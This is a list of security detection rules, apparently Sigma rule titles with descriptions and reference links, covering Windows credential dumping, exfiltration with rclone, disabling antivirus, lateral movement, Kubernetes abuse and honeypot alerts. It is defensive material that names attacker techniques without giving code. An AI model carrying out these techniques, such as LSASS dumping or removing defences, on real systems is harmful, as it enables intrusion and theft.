https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file |
Suspicious Add Scheduled Task From User AppData Temp |
schtasks.exe create task from user AppData\Local\Temp |
malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 |
Suspicious Execution of Sc to Delete AV Services |
Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
Stop Windows Service |
Detects a Windows service to be stopped |
None |
Suspicious Bitstransfer via PowerShell |
Detects transferring files from system on a server bitstransfer Powershell cmdlets |
https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps |
Suspicious Cmd Execution via WMI |
Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |
https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html |
Suspicious Characters in CommandLine |
Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion |
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation |
Wscript Execution from Non C Drive |
Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. |
https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt, https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ |
Process Start From Suspicious Folder |
Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files |
Malware sandbox results |
Squirrel Lolbin |
Detects Possible Squirrel Packages Manager as Lolbin |
http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
PsExec Tool Execution |
Detects PsExec service execution via default service image name |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
PsExec Service Start |
Detects a PsExec service start |
None |
Run Whoami as SYSTEM |
Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Winword.exe Loads Suspicious DLL |
Detects Winword.exe loading a custom DLL using the /l flag |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ |
WMI Execution Via Office Process |
Initial execution of malicious document calls wmic to execute the file with regsvr32 |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
WMI Remote Command Execution |
An adversary might use WMI to execute commands on a remote system |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
WMI Reconnaissance List Remote Services |
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Windows Update Client LOLBIN |
Detects code execution via the Windows Update client (wuauclt) |
https://dtm.uk/wuauclt/ |
Sysinternals SDelete Registry Keys |
A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. |
https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md |
Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Abusing Windows Telemetry For Persistence - Registry |
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
The problem is, it will run any arbitrary command without restriction of location or type.
|
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
User Account Hidden By Registry |
Detect modification for a specific user to prevent that user from being listed on the logon screen |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md |
Service Binary in Uncommon Folder |
Detect the creation of a service with a service binary located in a uncommon directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Disable Microsoft Office Security Features |
Disable Microsoft Office Security Features by registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ |
Adwind RAT / JRAT - Registry |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
Office Security Settings Changed |
Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
Potential Persistence Via COM Hijacking From Suspicious Locations |
Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location. |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) |
Potential Persistence Via COM Search Order Hijacking |
Detects potential COM object hijacking leveraging the COM Search Order |
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ |
SilentProcessExit Monitor Registration |
Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process |
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
Accessing WinAPI in PowerShell for Credentials Dumping |
Detects Accessing to lsass.exe by Powershell |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon |
Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Mimikatz Detection LSASS Access |
Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) |
https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html |
PowerShell Execution |
Detects execution of PowerShell |
https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html |
RClone Execution |
Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
Windows Defender Threat Detection Disabled |
Detects disabling Windows Defender threat protection |
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Domain Trust Discovery |
Detects a discovery of domain trusts. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md |
Lateral Movement Indicator ConDrv |
This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm, https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html |
Security Event Log Cleared |
Checks for event id 1102 which indicates the security event log was cleared. |
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml |
Group Modification Logging |
Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.
Sigma detects
Event ID 4728 indicates a "Member is added to a Security Group".
Event ID 4729 indicates a "Member is removed from a Security enabled-group".
Event ID 4730 indicates a "Security Group is deleted".
The case is not applicable for Unix OS.
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 |
Suspicious Esentutl Use |
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. |
https://lolbas-project.github.io/, https://twitter.com/chadtilbury/status/1264226341408452610 |
Correct Execution of Nltest.exe |
The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm, https://attack.mitre.org/software/S0359/ |
Rclone Execution via Command Line or PowerShell |
Detects Rclone which is commonly used by ransomware groups for exfiltration |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
Activity Related to NTDS.dit Domain Hash Retrieval |
Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely |
https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/, https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/, https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ |
New Service Uses Double Ampersand in Path |
Detects a service installation that uses a suspicious double ampersand used in the image path value |
Internal Research |
SAM Dump to AppData |
Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers |
None |
Django Framework Exceptions |
Detects suspicious Django web application framework exceptions that could indicate exploitation attempts |
https://docs.djangoproject.com/en/1.11/ref/exceptions/, https://docs.djangoproject.com/en/1.11/topics/logging/#django-security |
Potential JNDI Injection Exploitation In JVM Based Application |
Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation. |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs, https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0 |
Potential Local File Read Vulnerability In JVM Based Application |
Detects potential local file read vulnerability in JVM based apps.
If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.
|
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Potential OGNL Injection Exploitation In JVM Based Application |
Detects potential OGNL Injection exploitation, which may lead to RCE.
OGNL is an expression language that is supported in many JVM based systems.
OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
|
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Kubernetes CronJob/Job Modification |
Detects when a Kubernetes CronJob or Job is created or modified.
A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.
An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
|
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob |
Process Execution Error In JVM Based Application |
Detects process execution related exceptions in JVM based apps, often relates to RCE |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Potential XXE Exploitation Attempt In JVM Based Application |
Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely. |
https://rules.sonarsource.com/java/RSPEC-2755, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Kubernetes Admission Controller Modification |
Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
|
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://security.padok.fr/en/blog/kubernetes-webhook-attackers |
Deployment Deleted From Kubernetes Cluster |
Detects the removal of a deployment from a Kubernetes cluster.
This could indicate disruptive activity aiming to impact business operations.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/ |
Kubernetes Events Deleted |
Detects when events are deleted in Kubernetes.
An adversary may delete Kubernetes events in an attempt to evade detection.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/ |
Potential Remote Command Execution In Pod Container |
Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/ |
Container With A hostPath Mount Created |
Detects creation of a container with a hostPath mount.
A hostPath volume mounts a directory or a file from the node to the container.
Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/, https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 |
Privileged Container Deployed |
Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks.
A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.
Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/, https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer, https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html, https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html |
Creation Of Pod In System Namespace |
Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.
System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.
Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.
Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/ |
RBAC Permission Enumeration Attempt |
Detects identities attempting to enumerate their Kubernetes RBAC permissions.
In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment.
In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command.
This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.
|
https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html |
Kubernetes Rolebinding Modification |
Detects when a Kubernetes Rolebinding is created or modified.
|
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab |
Kubernetes Secrets Enumeration |
Detects enumeration of Kubernetes secrets. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/ |
Kubernetes Secrets Modified or Deleted |
Detects when Kubernetes Secrets are Modified or Deleted.
|
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/ |
New Kubernetes Service Account Created |
Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.
|
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/ |
Potential Sidecar Injection Into Running Deployment |
Detects attempts to inject a sidecar container into a running deployment.
A sidecar container is an additional container within a pod, that resides alongside the main container.
One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation.
By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.
|
https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/ |
Kubernetes Unauthorized or Unauthenticated Access |
Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.
This may indicate an attacker attempting to leverage credentials they have obtained.
|
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues |
Potential RCE Exploitation Attempt In NodeJS |
Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability. |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
OpenCanary - FTP Login Attempt |
Detects instances where an FTP service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - GIT Clone Request |
Detects instances where a GIT service on an OpenCanary node has had Git Clone request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTPPROXY Login Attempt |
Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
|
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTP GET Request |
Detects instances where an HTTP service on an OpenCanary node has received a GET request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTP POST Login Attempt |
Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
|
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MSSQL Login Attempt Via SQLAuth |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
|
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MSSQL Login Attempt Via Windows Authentication |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
|
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MySQL Login Attempt |
Detects instances where a MySQL service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - NTP Monlist Request |
Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - REDIS Action Command Attempt |
Detects instances where a REDIS service on an OpenCanary node has had an action command attempted. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SIP Request |
Detects instances where an SIP service on an OpenCanary node has had a SIP request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SMB File Open Request |
Detects instances where an SMB service on an OpenCanary node has had a file open request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SNMP OID Request |
Detects instances where an SNMP service on an OpenCanary node has had an OID request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SSH Login Attempt |
Detects instances where an SSH service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SSH New Connection Attempt |
Detects instances where an SSH service on an OpenCanary node has had a connection attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - Telnet Login Attempt |
Detects instances where a Telnet service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - TFTP Request |
Detects instances where a TFTP service on an OpenCanary node has had a request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - VNC Connection Attempt |
Detects instances where a VNC service on an OpenCanary node has had a connection attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
Python SQL Exceptions |
Generic rule for SQL exceptions in Python according to PEP 249 |
https://www.python.org/dev/peps/pep-0249/#exceptions |
Remote Schedule Task Lateral Movement via ATSvc |
Detects remote RPC calls to create or execute a scheduled task via ATSvc |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Recon via AtScv |
Detects remote RPC calls to read information about scheduled tasks via AtScv |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/zeronetworks/rpcfirewall, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Possible DCSync Attack |
Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Event Log Recon |
Detects remote RPC calls to get event log information via EVEN or EVEN6 |
https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Encrypting File System Abuse |
Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Lateral Movement via ITaskSchedulerService |
Detects remote RPC calls to create or execute a scheduled task |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Recon via ITaskSchedulerService |
Detects remote RPC calls to read information about scheduled tasks |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Printing Abuse for Lateral Movement |
Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote DCOM/WMI Lateral Movement |
Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Registry Lateral Movement |
Detects remote RPC calls to modify the registry and possible execute code |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Registry Recon |
Detects remote RPC calls to collect information |
